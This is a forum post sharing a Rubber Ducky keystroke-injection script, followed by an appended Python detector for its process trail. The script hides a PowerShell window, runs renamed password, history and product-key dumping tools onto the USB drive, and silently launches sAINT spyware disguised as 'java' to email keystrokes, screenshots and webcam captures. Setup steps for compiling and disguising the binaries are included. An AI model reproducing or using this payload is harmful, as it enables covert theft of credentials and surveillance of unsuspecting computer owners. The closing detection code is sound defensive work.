Hak5 Forums
W1L5T3R

Stealer for Rubber Ducky twin


Standing on the shoulders of giants on this one :) shout out to them

This will do the following:

1. Move the PowerShell dialogue (small size) to the bottom of the screen

2. Steal all browser passwords and dump them onto the Rubber Ducky

3. Steal all browser history and dump it onto the Rubber Ducky

4. Steal product keys and dump them onto the Rubber Ducky (it will dump everything installed which needs a product key)

5. Silently install sAINT and then dump keystrokes, screenshot and webcam snap to your email (disguised as java and not detected)

All of this, from plugging in the Rubber Ducky to removing it, is within 10 seconds.

I just adjusted the coding a little and got it running quickly and silently.

To make sAINT work, use a Linux machine (Kali or Parrot or whatever), download sAINT and compile the .exe. Rename the .exe to whatever you like and store it on the Rubber Ducky.

Download browser history, browser password viewer and product key viewer from here: https://www.nirsoft.net/

Rename them to whatever you like and use the encoder to make the inject.bin.

Here is a copy of the script:

DELAY 300
REM CLOSES ALL WINDOWS THAT ARE OPEN 
GUI d
DELAY 200
REM OPEN RUN BOX 
GUI r
DELAY 100
REM OPENS POWERSHELL 
STRING powershell.exe
DELAY 100
ENTER
DELAY 100
REM CHANGES TERMINAL TO SMALL BOX
STRING MODE CON:COLS=18 LINES=1
DELAY 100
ENTER
DELAY 100
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM SETS THE PATH FOR THE USB DRIVE AND CHANGES LABEL TO _  (underscore)
STRING $usbPath = GET-WMIObject Win32_Volume | ? { $_.label -eq '_' } | select name
ENTER
DELAY 100
REM CD INTO USB DRIVE 
STRING cd $usbPath.name
ENTER
REM RUNS BROWSER PASS STEALER SILENTLY AND STORES TEXT FILE ON USB 
STRING ./WinUpdate1 /stext win1log.txt   <<<<<<renamed to WinUpdate1>>>>>>
DELAY 100
ENTER
REM RUNS BROWSER HISTORY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE
STRING ./WinUpdate2 /stext win2log.txt    <<<<<<<renamed to WinUpdate2>>>>>
DELAY 100
ENTER
REM RUNS PRODUCT KEY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE
STRING ./PKV /stext pkvlog.txt    <<<<<<renamed to PKV>>>>>>
DELAY 100
ENTER
DELAY 200
REM RUNS SAINT LOGGER SILENTLY AND REPORTS TO YOUR EMAIL SCREENSHOT AND KEYSTROKES PLUS WEBCAM SNAP
STRING ./java      <<<<<I renamed the sAint.exe to java>>>>>
DELAY 100
ENTER
STRING exit
ENTER
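
For defenders, the script above leaves a distinctive process trail: a `mode.com` call that shrinks the console to 18x1, then several executables started from a non-system drive with the `/stext` switch, all children of one shell within seconds. The following is an added example, not part of the original post, that flags that pattern in process-creation records; the record field names, sample events, thresholds and the assumption that Windows is installed on C: are constructed for illustration.

```python
import re
from collections import defaultdict

SYSTEM_DRIVE = "C:"   # assumption: Windows is installed on C:
WINDOW_SECONDS = 10   # the post says the whole run finishes within 10 seconds

# Constructed sample records; field names are hypothetical, modelled on
# process-creation logging that captures parent PID and full command line.
EVENTS = [
    {"t": 0.0, "ppid": 4120, "image": r"C:\Windows\System32\mode.com",
     "cmd": r"mode.com CON:COLS=18 LINES=1"},
    {"t": 2.1, "ppid": 4120, "image": r"E:\WinUpdate1.exe",
     "cmd": r"E:\WinUpdate1.exe /stext win1log.txt"},
    {"t": 2.6, "ppid": 4120, "image": r"E:\WinUpdate2.exe",
     "cmd": r"E:\WinUpdate2.exe /stext win2log.txt"},
    {"t": 3.0, "ppid": 4120, "image": r"E:\PKV.exe",
     "cmd": r"E:\PKV.exe /stext pkvlog.txt"},
    # Benign: an admin resizing a normal console, and a lone tool on C:
    {"t": 50.0, "ppid": 7700, "image": r"C:\Windows\System32\mode.com",
     "cmd": r"mode.com con:cols=120 lines=40"},
    {"t": 51.0, "ppid": 7700, "image": r"C:\Tools\inventory.exe",
     "cmd": r"C:\Tools\inventory.exe /stext out.txt"},
]

def classify(ev):
    """Return a tag for one event, or None if it matches neither pattern."""
    cmd = ev["cmd"].lower()
    if ev["image"].lower().endswith(r"\mode.com"):
        m = re.search(r"cols=(\d+)\s+lines=(\d+)", cmd)
        if m and int(m.group(1)) <= 20 and int(m.group(2)) <= 2:
            return "tiny_console"
    if re.search(r"(^|\s)/stext(\s|$)", cmd) and ev["image"][:2].upper() != SYSTEM_DRIVE:
        return "stext_off_system_drive"
    return None

def suspect_shells(events):
    """Parent PIDs with two consecutive tagged children inside the window."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["t"]):
        tag = classify(ev)
        if tag:
            hits[ev["ppid"]].append((ev["t"], tag, ev["image"]))
    return {ppid: rows for ppid, rows in hits.items()
            if any(b[0] - a[0] <= WINDOW_SECONDS for a, b in zip(rows, rows[1:]))}

if __name__ == "__main__":
    for ppid, rows in suspect_shells(EVENTS).items():
        print(ppid, [(tag, image) for _, tag, image in rows])
```

A non-C: drive letter is only a stand-in for "removable"; in production, resolve the drive type from the endpoint's own volume inventory before alerting.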
